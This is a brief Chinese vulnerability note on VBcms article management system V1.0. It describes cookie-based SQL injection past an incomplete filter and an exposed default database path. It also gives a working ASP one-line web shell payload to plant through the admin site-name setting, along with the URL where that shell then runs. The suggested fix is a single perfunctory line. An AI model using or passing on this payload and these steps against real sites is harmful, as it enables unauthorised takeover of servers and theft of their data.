VBcms文章管理系统V 1.0漏洞及修复

　　下午遇到这个CMS，于是看了看代码
　　Check_SqlIn.asp防注入代码未过滤完全注入漏洞：
　　1）未对cookie方式进行过滤，cookie注入
　　2）默认数据库：
　　data/article.mdb
　　3）后台拿shell:
　　后台地址：admin/login.asp
　　系统配置-->网站名称处写入："<script language=VBScript runat=server>eval request（"1"）</script>"
　　一句话地址：http://www.***.com /admin/config.asp
　　修复：
　　修改默认下载地址，过滤